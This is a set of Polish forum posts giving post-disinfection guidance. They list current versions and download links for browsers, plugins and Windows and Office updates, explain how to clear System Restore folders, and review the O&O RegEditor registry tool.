picasso

Istotne aktualizacje - inne aplikacje Na forum po pomyślnej dezynfekcji zawsze prosimy o wykonanie podstaw zabezpieczających, czyli aktualizacje Windows i programów. Oczywiście poniżej jest zbiorcze zestawienie, każdy otrzyma w temacie konkretną wskazówkę o które aplikacje chodzi. Przeglądarki / poczta Firefox Aktualna wersja stabilna dla Windows 10 i Windows 11: Firefox 132.0.1 Biuletyny bezpieczeństwa: Security Advisories for Firefox / Mozilla Security Blog Pobieranie [wybrać odpowiednią wersję 64-bit lub 32-bit] Pobieranie ze Sklepu Microsoftu [tylko wersja 64-bit] Obecnie limitowane wsparcie dla Windows 7 i Windows 8.1 : Więcej informacji. Ostatnia wersja dla tych systemów to Firefox 115 ESR (64-bit | 32-bit) z gwarancją łat do marca 2025. Zakończyło się wsparcie dla systemów XP i Vista: Więcej informacji. Ostatnią wersją dla tych systemów jest Firefox 52.9.0 ESR 32-bit (łaty bezpieczeństwa gwarantowane do czerwca 2018). Edycja 64-bit w ogóle nie była dostępna dla tych systemów. Google Chrome Aktualna wersja stabilna dla Windows 10 i Windows 11: Google Chrome 130.0.6723.116/.117 Biuletyny bezpieczeństwa: Notatki "Security" na kanale "Stable Channel Update" Pobieranie (wersja 64-bit online) - Pobieranie (wersja 32-bit online) Pobieranie (wersja offline) - Pobieranie (wersja offline) Wsparcie dla systemów Windows 7 i Windows 8.1 zakończyło się w lutym 2023: Więcej informacji. Ostatnia wersja działająca na tych systemach to Chrome 109. Jest w niej wyświetlany komunikat o braku wsparcia, który można usunąć z widoku przy udziale edycji rejestru. Wsparcie dla systemów XP i Vista zakończyło się w kwietniu 2016: Więcej informacji. Ostatnia wersja działająca na tych systemach to Chrome 49. Brak obsługi dotyczy także każdej innej alternatywnej przeglądarki opartej o silnik Chromium 50 (np. Chromium 50, Opera 37, Vivaldi 1.1). Microsoft Edge (wersja oparta na Chromium) Aktualna wersja stabilna dla Windows 10 i Windows 11: Microsoft Edge 130.0.2849.80 Biuletyny bezpieczeństwa: Release notes for Microsoft Edge Security Updates / Security Update Guide (z menu "Platform" wybrać "Browser", zastępuje Chromium Security Updates) Pobieranie (wersja online) - Pobieranie (wersja offline) - Pobieranie (wersja offline) Zastępuje starą wersję zintegrowaną w Windows 10, która jest usuwana przy udziale aktualizacji KB5001330. Wersję Chromium można zainstalować zarówno ręcznie z podanych linków, jak i bezpośrednio z Windows Update. Przeglądarka serwowana jako KB4559309 (Windows 10 Wersja 1803 i nowsze) lub KB4567409 (Windows 7 SP1 i Windows 8.1). Na Windows 10 aktualizacja jest permanentna i nie można jej odinstalować. Przeglądarka zintegrowana w Windows 11. Wsparcie dla systemów Windows 7 i Windows 8.1 zakończyło się w styczniu 2023: Więcej informacji. Ostatnia wersja działająca na tych systemach to Edge 109. Porównaj z Chrome. Opera Aktualna wersja stabilna dla Windows 10 i Windows 11: Opera 114.0.5282.154 Biuletyny bezpieczeństwa: Opera Security Team's Blog / Changelog Pobieranie (wersja online i offline) - Pobieranie (wersja offline) Wsparcie dla systemów Windows 7 i Windows 8.1 zakończyło się w styczniu 2023: Więcej informacji. Ostatnia wersja działająca na tych systemach to Opera 95. Porównaj z Chrome i Edge. Opera 37 (silnik Chromium 50) i nowsze - Systemy XP i Vista nie są już obsługiwane. Ostatnia wersja możliwa do instalacji to Opera 36. Alternatywny link tutaj. Opera 12.x (silnik Presto) nie jest już rozwijana i wspierana. Ostatnia (przestarzała) wersja tej linii to Opera 12.18, a widoczny link do jej pobierania usunięto. Opera Mail - Dodatkowy klient pocztowy również został wycofany, co oznacza brak dalszego wsparcia technicznego oraz aktualizacji aplikacji i zabezpieczeń. Thunderbird Aktualna wersja stabilna dla Windows 10 i Windows 11: Thunderbird 128.4.2 ESR Biuletyny bezpieczeństwa: Security Advisories for Thunderbird Pobieranie Ostatnia wersja dla Windows 7 i Windows 8.1 to Thunderbird 115 ESR. W odróżnieniu od Firefoxa, to finalna wersja bez długofalowego wsparcia aktualizacji. Zakończyło się wsparcie dla systemów XP i Vista: Więcej informacji. Ostatnią wersją dla tych systemów jest Thunderbird 52.9.1. Safari Aktualna wersja stabilna: brak Biuletyny bezpieczeństwa: Apple security updates / Apple No Longer Updating Safari for Windows Przeglądarka Safari w wersji dla Windows została porzucona. Używanie starej niezałatanej wersji 5.x z 2012 nie jest bezpieczne. Należy zmienić przeglądarkę. Wtyczki do przeglądarek Architekturę wtyczek możemy podzielić na: ActiveX (Internet Explorer), NPAPI (Firefox poniżej wersji 52 i pochodne, Opera 12.x), PPAPI (Google Chrome, Microsoft Edge bazujące na Chromium, Opera 24+ i pochodne). Firefox: Wsparcie dla wtyczek NPAPI (m.in. Java i Silverlight) wycofano w Firefox 52 32-bit, a edycja Firefox 64-bit jest pozbawiona tej obsługi out-of-box. Stare wtyczki NPAPI są teraz obsługiwane tylko w forkach opartych na starszym kodzie (np. Pale Moon i Basilisk). Dlaczego wtyczki Java, Silverlight, Adobe Acrobat i inne nie działają? Google Chrome: Jedyny obsługiwany typ wtyczek to PPAPI. Wtyczki NPAPI (m.in. Java i Silverlight) nie są już obsługiwane: od wersji 42 domyślnie blokowane i niewidzialne na liście wtyczek, od wersji 45 kompletny brak obsługi, od wersji 57 w ogóle nie jest dostępna lista wtyczek i adres chrome://plugins nie działa. Opera: Od wersji Opera 37 jedyny obsługiwany typ wtyczek to PPAPI. W wersjach Opera 24 do 36 były obsługiwane dwa typy wtyczek, tzn. PPAPI i NPAPI (m.in. Java i Silverlight). Microsoft Edge: Nowa wersja oparta na Chromium zachowuje się tak jak Chrome. Stara zaś nie korzysta z żadnej z wyliczonych architektur. Wtyczki są jedną z popularnych dróg infekcji, m.in. tych szyfrujących dane. Najlepszym zabezpieczeniem jest całkowity brak wtyczek. Problem obecnie zneutralizowany na najnowszych wersjach Chromium i Firefox nie obsługujących tego mechanizmu. Uwaga się skupia więc na pochodnych Firefox (Pale Moon i Basilisk), które z uporem maniaka utrzymują wsparcie, oraz IE. Proszę się pozbyć wszystkich starych wersji deinstalując powiązane programy przez Panel sterowania. Dodatkowo w sekcjach danego programu umieszczam awaryjne deinstalatory w przypadku kłopotów deinstalacyjnych. Acrobat Reader (dawniej Adobe Reader) Aktualna wersja dla Windows 10 i Windows 11: Acrobat Reader DC 23.008.20470 64-bit i 32-bit Aktualna wersja dla Windows 7 i Windows 8.1: Acrobat Reader DC 23.008.20470 32-bit Architektura wtyczek: ActiveX, NPAPI Biuletyny bezpieczeństwa: Adobe Product Security Incident Response Team Pobieranie (wersja online) - Pobieranie (wersja offline) Pobieranie aktualizacji (wersja offline) Uwaga: "Pobieranie (wersja online)" - na stronie mogą być domyślnie zaznaczeni sponsorzy instalacji. Więcej informacji: Portale z oprogramowaniem / Instalatory - na co uważać. O ile ma się odbyć pobieranie stamtąd, należy odznaczyć ewentualne pole wyboru sponsora. Pierwszy link dynamicznie wykrywa system operacyjny i podstawia obsługiwaną wersję *, niemniej niesie zagrożenia instalacji sponsorów, a pobrany plik to tylko mini-downloader pobierający w tle instalację. Najlepiej skorzystać z pełnych instalacji typu "offline" kryjących się pod drugim linkiem. Dodatkowo poniżej podaję dokładne linki bezpośrednie. Instalacje składają się z bazy danej serii + nowszych mniejszych aktualizacji. Obecnie instalacje najnowszych wersji DC występują jako pełne paczki w tym linku "offline" powyżej. Wcześniej takie skombinowane paczki nie były dostępne i wymogiem była odrębna instalacja bazy danej serii (DC lub XI), a dopiero po tym uzupełnienie mniejszych aktualizacji. Dla linii DC aktualizacje są skumulowane, tzn. wystarczy instalować bazę i najnowszą dostępną aktualizację. Dla linii XI proces ten mógł zależeć od typu aktualizacji. Nie jest możliwa bezpośrednia aktualizacja między edycjami XI > DC. Jeśli instalacja wersji DC odbywa się od zera, należy zainstalować albo najnowszy pakiet łączony, albo po staremu najpierw bazę a po tym pasującą do niej aktualizację. Jeśli jednak ktoś już posiada wersję bazową lub nowszą tej samej serii, wystarczy pobrać i zainstalować tylko najnowszą aktualizację pasującą do danej bazy. Instalatory 64-bit dla 64-bitowych Windows 10 i Windows 11 Acrobat 64-bit installers for Windows (Acrobat_DC_Web_x64_WWMUI.zip) Natywna wersja 64-bit jest oferowana na obszarze Polski od sierpnia 2022. Instalator 64-bit unifikuje dwa produkty (płatny Acrobat i darmowy Acrobat Reader) oraz wszystkie języki. Wydaje się, że paczka jest na bieżąco aktualizowana i zawsze zawiera najnowszą dostępną aktualizację. Gdyby nastąpiły jakieś rozbieżności, brakujące drobne łatki można dociągnąć z podanego wcześniej linka aktualizacji szukając plików o schemacie nazewniczym AcrobatDCx64UpdNumerWersji.msp. Instalatory 32-bit dla Windows 7 i Windows 8.1 oraz 32-bitowego Windows 10: Obecnie instalatory offline łączą bazę z najnowszą aktualizacją: Acrobat Reader DC Polski: Acrobat Reader DC 23.006.20380 (AcroRdrDC2300620380_pl_PL.exe) Na chwilę obecną brak najnowszego instalatora Acrobat Reader DC MUI (Multijęzyczny): Acrobat Reader DC 23.008.20470 (AcroRdrDC2300820470_MUI.exe) Na wszelki wypadek zostawiam poprzednią kombinację: Baza Reader DC 15.007.20033 (AcroRdrDC1500720033_pl_PL.exe) + najnowsza aktualizacja 23.008.20470 Optional update, Jan 16, 2024 (AcroRdrDCUpd2300820470.msp) Baza Reader DC 15.007.20033 (AcroRdrDC1500720033_MUI.exe) + najnowsza aktualizacja 23.008.20470 Optional update, Jan 16, 2024 (AcroRdrDCUpd2300820470_MUI.msp) Instalatory dla XP i Vista: Adobe Reader XI Polski: Baza Adobe Reader XI 11.0.00 (AdbeRdr11000_pl_PL.exe) + najnowsza aktualizacja Adobe Reader XI 11.0.23 (AdbeRdrUpd11023.msp) Adobe Reader XI MUI (Multijęzyczny): Baza Adobe Reader XI 11.0.00 (AdbeRdr11000_mui_Std.zip) + najnowsza aktualizacja Adobe Reader XI 11.0.23 (AdbeRdrUpd11023_MUI.msp) * Linia XI porzucona (ostatnia wersja z 2017). Oficjalnie edycja XI nie jest dostępna dla Vista, zaś ostatnia wersja posiadająca obsługę XP to XI 11.0.08. Wyższe wersje teoretycznie nie są obsługiwane i wbudowany w program automatyczny aktualizator nie wykryje nowszej wersji. Niemniej nieoficjalnie na obu systemach wykonalna ręczna instalacja podanych powyżej nowszych aktualizacji. Edycja DC nie jest możliwa do instalacji na tych systemach. Awaryjny deinstalator: AcroCleaner W linku są cztery wersje narzędzia dopasowane do danej linii rozwojowej: dla DC 64-bit, dla DC 32-bit, dla wersji 10 i 11, oraz dla wersji 9. Przed jego użyciem należy w pierwszej kolejności spróbować tradycyjnej deinstalacji. Alternatywy dla Adobe Reader Proszę rozważyć, czy powyższe instalacje Adobe Reader DC lub XI (z integracjami wtyczek w przeglądarkach) są naprawdę potrzebne. Programy ciężkie i mające wieczne problemy z lukami zabezpieczeń. Popularną alternatywą był wcześniej Foxit Reader, ale i on wkroczył na drogę bardzo rozbudowanej instalacji. Wszystkie główne przeglądarki, wliczając Microsoft Edge, mają wbudowaną przeglądarkę PDF. Jeśli chodzi o zewnętrzne programy: Wersje Desktop: Jeśli ktoś szuka szybkiej lekkiej niezależnej przeglądarki PDF portable, to polecam Sumatra PDF. Wersje Uniwersalne/Modern: Systemy Windows 8/8.1 mają z biegu wbudowaną Aplikację Czytnik obsługującą otwieranie plików PDF. Na systemie Windows 10 nie jest już preinstalowana, a dodatkowa wersja ze Sklepu Windows została wycofywana (kieruje do otwierania plików PDF via Edge). W Sklepie można też znaleźć inne czytniki PDF, ale nie sprawdzałam jakości żadnego z nich. Adobe Flash Aktualna wersja: brak Architektura wtyczek: ActiveX, NPAPI, PPAPI Produkt i wsparcie usunięte 31 grudnia 2020: Adobe Flash Player EOL. Wersje powyżej 32.0.0.371 mają wbudowaną bombę czasową 12 stycznia 2021 uniemożliwiającą dalsze korzystanie. - Obsługa Adobe Flash została wyeliminowana z wszystkich głównych przeglądarek (Firefox 85, Chrome 88, Edge 88). - Dodatkowo, Microsoft forsuje z Windows Update aktualizację KB4577586 mającą na celu usunięcie Adobe Flash zintegrowanego w systemach Windows 10 i Windows 8.1. Alternatywnie można skorzystać z linków Microsoft Catalog. Awaryjny deinstalator (nie dotyczy Chrome, Edge i integracji w Windows): Uninstaller for Flash Player Adobe Shockwave Aktualna wersja: brak Architektura wtyczek: ActiveX, NPAPI Nazewnictwo produktów Adobe może być mylące. Przeglądarki internetowe używają frazy "Shockwave Flash" opisując ... Adobe Flash Player. Adobe Shockwave Player to nie jest Adobe Flash Player. W większości przypadków ta instalacja była i tak kompletnie zbędna i były zastrzeżenia tyczące bezpieczeństwa ogólnego. Produkt i wsparcie usunięte 9 kwietnia 2019: End of Life for Adobe Shockwave Awaryjny deinstalator: Shockwave uninstaller Aktualna wersja z obsługą wtyczek: Java SE 8u431 (JRE) Architektura wtyczek: ActiveX, NPAPI Biuletyny bezpieczeństwa: Critical Patch Updates, Security Alerts and Bulletins / Oracle Security Blog Pobieranie (z java.com) - Pobieranie (z oracle.com / wymagane konto Oracle) Uwaga: instalatory Java typu "online" oraz aktualizator już zainstalowanej Java mają zaplanowaną instalację sponsorów. Więcej informacji: Portale z oprogramowaniem / Instalatory - na co uważać. Proszę wybrać jako instalację bazową wersję offline, a dodatkowo zapobiec podsuwaniu sponsora przy aktualizacji stosując wytyczne w następnym poście "Java - dodatkowe kroki". Nowsze edycje Java SE w ogóle nie zawierają wtyczek. Ostatnią edycją z wtyczkami jest starsza Java SE 8 w wersji standardowej dla przeciętnych użytkowników oznaczonej skrótem JRE. Ponadto, obecnie wsparcie wtyczek w przeglądarkach ogranicza się do Internet Explorer oraz pochodnych Firefox (Pale Moon, Basilisk). Systemy 64-bit: wybór wersji zależy od typu zainstalowanej przeglądarki (64-bit lub 32-bit) i mogą być wymagane dwie instalacje, tzn. Windows Offline (64-bitowa) oraz Windows Offline. Systemy 32-bit: należy pobrać plik oznaczony jako "Windows Offline". Instalacja dotyczy też XP, choć oficjalnie nie jest on już obsługiwany: Windows XP a Java - Dlaczego system Windows XP nie jest już obsługiwany? Awaryjny deinstalator: Java Uninstall Tool (niestety narzędzie jest apletem Java i nie może usunąć bieżącej wersji z której korzysta, zastępuje niedostępny już JavaRa) Integracje Java w pakietach biurowych Szczególny przypadek to pakiety biurowe wykorzystujące Java: - Apache OpenOffice - Stary OpenOffice.org 3.3 w paczce ze zintegrowaną Java instaluje dziurawą wersję Java 6 update 22, nowsza nie jest wykrywana. Apache OpenOffice 3.4.0 / 3.4.1 obsługuje Java 7 i nowsze, ale Java nie jest już doczepiana do instalatora, choć program nadal jej wymaga dla określonych funkcji (trzeba instalować oddzielnie). - LibreOffice - Zachowuje się podobnie. Wsparcie dla Java 7 i nowszych zaczyna się od wersji 3.5. W obu przypadkach należy zaktualizować pakiety biurowe do najnowszych wersji (podałam powyżej linki), które będą w stanie korzystać z wersji Java 8. Programy ArchiCAD Instalatory poniżej wersji Archicad 22 są ściśle powiązane z konkretną wersją Java. By móc poprawnie odinstalować daną wersję ArchiCAD, należy tymczasowo przywrócić dopasowaną starą wersję Java, a po wykonaniu deinstalacji ArchiCAD ją ponownie usunąć. Poniżej link pobierania Java dopasowanych do konkretnych ArchiCADów: Java Versions for GRAPHISOFT Products Systemy logowania do banków wymagające starych wersji Java Niestety są pewne strony wymuszające obecność starych niebezpiecznych wersji Java (np. Java 7). W przypadku gdy nie da się tego w żaden sposób obejść, można nadal pobrać stare wersje Java z archiwum linkowanego poniżej, niestety wymagane posiadanie konta Oracle. Proszę mieć na uwadze, że są to wersje z lukami narażające bezpieczeństwo systemu. Podaję ten link tylko po to, by nie szukać starych Java na portalach z oprogramowaniem (zagrożenie infekcjami adware). Oracle Java Archive Silverlight Aktualna wersja: brak Architektura wtyczek: ActiveX, NPAPI Biuletyny bezpieczeństwa: Microsoft Silverlight Release History Porzucona technologia, obecnie obsługiwana tylko w Internet Explorer oraz pochodnych Firefox (Pale Moon, Basilisk). Całkowite wsparcie wygasło zgodnie z końcową datą wsparcia danej platformy (14 styczeń 2020 dla Windows 7, 12 październik 2021 dla nowszych systemów): Więcej informacji. Microsoft skrzętnie usunął bezpośrednie odnośniki pobierania włączając w to linki w Microsoft Catalog. Awaryjny deinstalator: Instrukcje ręczne QuickTime Aktualna wersja: brak Architektura wtyczek: w wersji 7.7.9 brak wtyczek, w starszych ActiveX i NPAPI Biuletyny bezpieczeństwa: Apple Ends Support for QuickTime for Windows; New Vulnerabilities Announced Pobieranie nadal możliwe, ale ściśle zalecana deinstalacja całego zestawu Apple. Wykryte nowe poważne luki w oprogramowaniu. Apple nie załata ich, odpowiedzią firmy było wycofanie wsparcia dla Windows i oficjalna namowa na deinstalację. Proszę się także pozbyć z systemu bardzo starej nieoficjalnej wersji QuickTime Alternative. Inne aplikacje FileZilla Client Aktualna wersja: FileZilla Client 3.68.1 Pobieranie FileZilla od dłuższego czasu jest programem powiązanym z instalacjami adware. Wcześniej problemem był downloader z Sourceforge. Po jego likwidacji autor programu przeszedł na inne metody "wsparcia". Są to: niepożądane programy adware/PUP w instalatorze FileZilla oraz tzw. Sponsored Updates (w zależności od geolokalizacji, podczas aktualizacji programu mogą się pokazać reklamy). Pierwszy problem został tu ominięty, gdyż podałam powyżej pod-stronę domową (domyślnie schowana) kierującą na instalator bez ofert - nazwy plików nie zawierają słowa sponsored. Alternatywy dla FileZilla: WinSCP, Cyberduck. Automaty do weryfikacji wersji softu Ograniczyłam się tu tylko do najistotniejszych aplikacji, które mogą brać udział w naruszeniu bezpieczeństwa, czyli przeglądarki i ich najbardziej popularne wtyczkowce, klienty poczty i FTP. Nie sposób tu w temacie uwzględnić wszystkich możliwych kombinacji. Do bardziej szczegółowej weryfikacji poziomu zabezpieczeń software można skorzystać z darmowych programów specjalizowanych w detekcji tego rodzaju. Lista darmowych aplikacji w tym temacie:

Istotne aktualizacje - Aktualizacje Windows i Microsoftu Na forum po pomyślnej dezynfekcji zawsze prosimy o wykonanie podstaw zabezpieczających, czyli aktualizacje Windows i programów. Oczywiście poniżej jest zbiorcze zestawienie, każdy otrzyma w temacie konkretną wskazówkę o które aplikacje chodzi. Internet Explorer Cykl wsparcia technicznego Internet Explorer - Od 12 stycznia 2016 wsparcie miały tylko najwyższe dostępne wersje IE dla w tamtym czasie obsługiwanych systemów operacyjnych, czyli tylko IE11 w Windows 8.1 i Windows 10. Wcześniej jeszcze w zakresie był IE11 w Windows 7 oraz IE9 w Vista, ale w związku z całkowitym brakiem wsparcia dla tych systemów sprawa stała się nieaktualna. Dla niewspieranych wersji (oznaczonych poniżej kolorem) oznaczało to brak aktualizacji zabezpieczeń i potencjalny nag-screen z ostrzeżeniem (KB3123303 ). Ostateczne wycofanie przeglądarki datuje się na 15 czerwiec 2022. Nowoczesne systemy Microsoftu nie obsługują IE: w Windows 11 komponent wyłączony z biegu, w Windows 10 na określonych liniach został ukatrupiony 14 lutego 2023 poprzez aktualizację Edge (KB5022834). Adnotacja dla starych Windows 7 i 8.1, w których IE pozostaje jako "fantom": Aktualizacja Internet Explorer z linków które jeszcze się ostały jest istotna, mimo porzucenia aplikacji przez Microsoft i korzystania z innej przeglądarki. Komponent silnie zintegrowany z Windows i wykorzystywany przez aplikacje zewnętrzne. Szczególnie teraz po ubiciu produktu mogą być na radarze jakieś stare niezałatane luki. Zestawienie dotyczące cyklu życia systemu Windows - Należy silnie wypunktować, że systemy nie zaktualizowane do odpowiedniego poziomu nie otrzymują żadnych aktualizacji. Domyślna metoda pozyskania aktualizacji to oczywiście Windows Update. Tu w temacie podaję jednak dodatkowe linki do pełnych instalatorów z katalogów Microsoftu, które pozwalają redukować potencjalne problemy wynikłe z mechanizmu pobierania automatycznego i inne zgrzyty. Windows 11 Bieżąca edycja systemu: Windows 11 Wersja 24H2 Build 26100 (tzw. Aktualizacja Windows 11 2024) Wersje 21H2 i 22H2 nie są już wspierane i nie otrzymują aktualizacji: Więcej informacji. Oficjalne linki pobierania Jak zainstalować system Windows 11 Windows Update: często zadawane pytania Historia aktualizacji systemu Windows 11 Windows 11 release information Poprzednie edycje/aktualizacje w spoilerze: Windows 10 Bieżąca edycja systemu: Windows 10 Wersja 22H2 Build 19045 (tzw. Aktualizacja Windows 10 2022) Wersja 22H2 będzie ostatnią edycją Windows 10, a koniec wsparcia jest planowany na 14 października 2025. Wszystkie poprzednie Wersje są już pozbawione wsparcia. Dla starych edycji pojawia się komunikat wymogu aktualizacji edycji systemu. Asystent aktualizacji do systemu Windows 10 (instaluje najnowszą wersję bazową) Historia aktualizacji systemu Windows 10 Windows 10 release information Poprzednie edycje/aktualizacje w spoilerze: Systemy Windows 11 i Windows 10 są aktualizowane wg innej metody niż stare systemy, najgrubsze aktualizacje są w istocie wymianą całego systemu. Są trzy metody aktualizacji: Standardowo tego typu aktualizacja jest dostarczana za pomocą Windows Update. Alternatywnie można skorzystać z narzędzia Asystent instalacji systemu Windows 11 / Asystent aktualizacji do systemu Windows 10. Trzecia metoda polega na skorzystaniu z Narzędzia do tworzenia nośników, kreator udostępnia opcję aktualizacji bieżącego komputera: Legalne pobieranie obrazów Windows Windows 8.1 Preinstalowana wersja: IE11 (wersja Desktop + Modern) Wsparcie dla Windows 8.1 zakończyło się 10 stycznia 2023. Od tego momentu system nie otrzymuje już żadnych aktualizacji zabezpieczających, można jedynie uzupełnić wcześniej wydane. Podstawowe instalatory bazowe: Instalowanie aktualizacji Windows 8.1 Update (KB 2919355) Windows 8.1 Update (KB2919355) Windows 8.1 Update dla systemów opartych na procesorach x64 (KB2919355) Windows 8.1 Update jest zbiorczą aktualizacją bazową, kombinującą nową funkcjonalność z zabezpieczeniami, wymaganą dla kontynuuowania dalszych aktualizacji systemu. Dostępna z poziomu Windows Update lub Centrum pobierania (podane powyżej linki odpowiednio dla systemów 32-bit i 64-bit). Przed jej zainstalowaniem jest konieczne uzupełnienie wszystkich poprzednich aktualizacji. Historia aktualizacji systemów Windows 8.1 (od lipca 2016) Windows 8 Preinstalowana wersja: IE10 (wersja Desktop + Modern) Dostępna aktualizacja: Brak - wymagana aktualizacja całego systemu do Windows 8.1, by pozyskać IE11 Wsparcie dla Windows 8 zakończyło się 12 stycznia 2016 i system nie otrzymuje już aktualizacji zabezpieczających. Obligatoryjna aktualizacja do Windows 8.1. Aktualizowanie systemu Windows 8 do wersji Windows 8.1 Aktualizacja KB2871389 Aktualizacja KB2917499 Windows 8.1 (z wbudowanym IE11) to wersja systemu oferowana jako bezpłatna aktualizacja dla Windows 8 - dostępna tylko z poziomu Sklepu Windows. By widzieć tę aktualizację w Sklepie, należy mieć zainstalowanie łaty KB2871389 oraz KB2917499, które można pozyskać z Windows Update lub Centrum pobierania (podaję powyżej linki). Aktualizacja do Windows 8.1 nie aplikuje się dla edycji Windows 8 Pro aktywowanej na kluczach wielokrotnych / licencji zbiorowej (Volume License) oraz Windows 8 Enterprise. Dla systemu spełniającego warunki aktualizacji do Windows 8.1 po uruchomieniu Sklepu na jego stronie głównej jest wyświetlany rzucający się w oczy kafelek z zawiadomieniem, którego kliknięcie otworzy stronę z linkiem do pobierania. Windows 7 Preinstalowana wersja: IE8 Dostępna aktualizacja: IE11 Wsparcie dla Windows 7 zakończyło się 14 stycznia 2020. Od tego momentu system nie otrzymuje już żadnych aktualizacji zabezpieczających, można jedynie uzupełnić wcześniej wydane. Podstawowe instalatory bazowe: Windows 7 Service Pack 1 (KB976932) Po instalacji SP1 w ścisłej kolejności krytyczne dodatki: KB4490628 - Servicing stack update: March 12, 2019 KB4474419 - SHA-2 code signing support update: September 23, 2019 KB4536952 - Servicing stack update: January 14, 2020 KB3172605 - July 2016 update rollup for Windows 7 SP1 (rozwiązuje problem z długim wyszukiwaniem aktualizacji i obciążeniem svchost) Następnie można uprościć wstępny proces dalszych aktualizacji i zainstalować wyliczany poniżej pakiet montujący większość łat wydanych między SP1 a kwietniem 2016. Paczka ta nie zawiera jednak wszystkich aktualizacji (np. łatki Internet Explorer są wykluczone). Convenience rollup update for Windows 7 SP1 (KB3125574) Internet Explorer 11 Po załadowaniu bazowych pakietów należy uruchomić Windows Update w celu wykonania dalszych uzupełnień. Historia aktualizacji systemów Windows 7 z dodatkiem SP1 (od lipca 2016) Nielegalne aktualizacje: Twory typu BypassESU przeciągające aktualizacje Windows 7 poza rok 2020 poprzez oferowanie za darmo płatnych Extended Security Updates (ESU) dla organizacji są nielegalne. Nawiasem mówiąc, nawet jeśli ktoś z tego korzysta to eldorado się skończyło. ESU wymarło z dniem 10 stycznia 2023. Windows Vista Preinstalowana wersja: IE7 Dostępna aktualizacja: IE9 Wsparcie dla Vista zakończyło się 11 kwietnia 2017. Od tego momentu system nie otrzymuje już żadnych aktualizacji zabezpieczających, można jedynie uzupełnić wcześniej wydane w bardzo ograniczonym zakresie. Informacje zostawiam w celach historycznych. Windows Update już nie działa. Wyklucza to przełączenie architektury na SHA-2. Microsoft znacznie opróżnił też alternatywne katalogi pobierania. Windows XP Preinstalowana wersja: IE6 Dostępna aktualizacja: IE8 Wsparcie dla Windows XP SP3 zakończyło się z dniem 8 kwietnia 2014. Od tego momentu system nie otrzymuje aktualizacji zabezpieczających, można jedynie uzupełnić wcześniej wydane w bardzo ograniczonym zakresie. Informacje zostawiam w celach historycznych. Windows Update już nie działa. Wyklucza to przełączenie architektury na SHA-2. Microsoft znacznie opróżnił też alternatywne katalogi pobierania. Aktualizacje pakietu Microsoft Office Jak zaktualizować Office? Plan an upgrade from older versions of Office to Microsoft 365 Apps Lista aktualizacji pakietów Office 2016 - 2013 Office 2013 Service Pack 1 (32-bit i 64-bit) Office 2010 Service Pack 2 (32-bit i 64-bit) Koniec wsparcia dla Office 2016 i 2019 jest planowany na 14 październik 2025. Wygasło wsparcie dla Office 2013 (11 kwietnia 2023), Office 2010 (13 październik 2020), Office 2007 (10 październik 2017), Office 2003 (8 kwietnia 2014). Dla tych wersji pakietu nie są już wydawane aktualizacje zabezpieczające. Stare Service Packi nie są już oficjalnie dostępne.

Czyszczenie folderów Przywracania systemu Na forum po pomyślnej dezynfekcji zawsze prosimy o zresetowanie zawartości folderów Przywracania systemu. Folderów nie opróżnia się ręcznie tylko przy udziale opcji konfiguracyjnych Windows. Rozwiń spoilery poniżej. Funkcja Przywracania systemu odpowiada za tworzenie kopii systemu w postaci tzw. punktów przywracania. Są one zgromadzone w specjalnych folderach System Volume Information. Foldery te leżą w głównych katalogach wszystkich dysków, są ukryte (widzialne dopiero po wyłączeniu w opcjach folderów "Ukryj chronione pliki systemu operacyjnego"), a na partycjach NTFS dostęp do nich jest zabroniony i próba wejścia w nie zwraca komunikat "Odmowa dostępu". Proszę nie próbować usuwać tych folderów, ani opróżniać ich ręcznie. Jeżeli komputer jest zainfekowany, to prawdopodobnie kopia zapasowa szkodnika może być utworzona przez mechanizm Przywracania w folderach System Volume Information i szkodnik z tej kopii się odtworzy podczas procesu uruchamiania cofania systemu. Antywirusy mogą w tej kopii wykrywać infekcje i nie potrafić tego wyczyścić, a nawet jeśli to zrobią, ingerencja oprogramowania zabezpieczającego w tych sferach nie jest do końca pożądana, potencjalne skutki uboczne to zerwanie ciągłości punktu Przywracania. Dlatego jest obierana inna, bardziej naturalna droga oczyszczania tego typu folderów System Volume Information. Skasowanie zawartości folderów odbywa się za pomocą wyłączenia tej funkcji na Windows XP do Vista, nowsze systemy mają już stosowną opcję umożliwiającą czyszczenie bez wyłączania. Po wyłączeniu można ją ponownie włączyć - wtedy jest tworzony pierwszy punkt przywracania z aktualnego (czystego po dezynfekcji) stanu systemu. Windows Vista i nowsze: Karta Ochrona systemu jest niedostępna z poziomu Trybu awaryjnego Windows. W tym stadium nie działają usługi powiązane. Operację należy prowadzić w Trybie normalnym Windows. Windows 10: Na tym systemie w zależności od progu wielkości dysku Przywracanie systemu może być już wyłączone od momentu instalacji, a w takiej sytuacji nie ma potrzeby czyszczenia tej strefy. Windows 10 Windows 8/8.1 Windows 7 Windows Vista Windows XP

O&O RegEditor Strona domowa Platforma: Windows Vista do Windows 10 32-bit i 64-bit Licencja: freeware O&O RegEditor - Przyjazny alternatywny edytor rejestru w miłej dla oka oprawie graficznej. Aplikacja potrafi prawie to samo co regedit systemowe, ale posiada kilka ulepszeń usprawniających pracę z rejestrem Windows. Mocną stroną jest nowoczesny interfejs skonstruowany w taki sposób, by zredukować ilość dodatkowych okien dialogowych charakterystycznych dla systemowego regedit. Z udogodnień niedostępnych w regedit należy wyliczyć: pasek narzędziowy i pasek adresów, ulepszoną wygodną wyszukiwarkę prezentującą wyniki w postaci listy z poziomu której można podjąć bezpośrednią edycję wartości lub przeskoczyć do wybranego klucza, uproszczony i przyjemniejszy system edycji, kopiowanie / wycinanie / wklejanie całych kluczy / podkluczy / wartości, import i eksport oraz wydruk ulubionych, listę najczęściej odwiedzanych lokalizacji, import i eksport formatu XML. W opcjach jest też możliwość skojarzenia plików REG, by były zawsze otwierane w O&O RegEditor. Wcześniejsze edycje miały specjalne graficzne oznaczenia dla linków symbolicznych (takich jak CurrentControlSet), niestety w najnowszej wersji zostały usunięte. Natomiast wadą edytora jest brak możliwości montowania gałęzi rejestru offline. Program jest typem portable. W paczce są dwie wersje edytora, odpowiednio dla platform 32-bit (OORegEdt32.exe) i 64-bit (OORegEdt.exe).

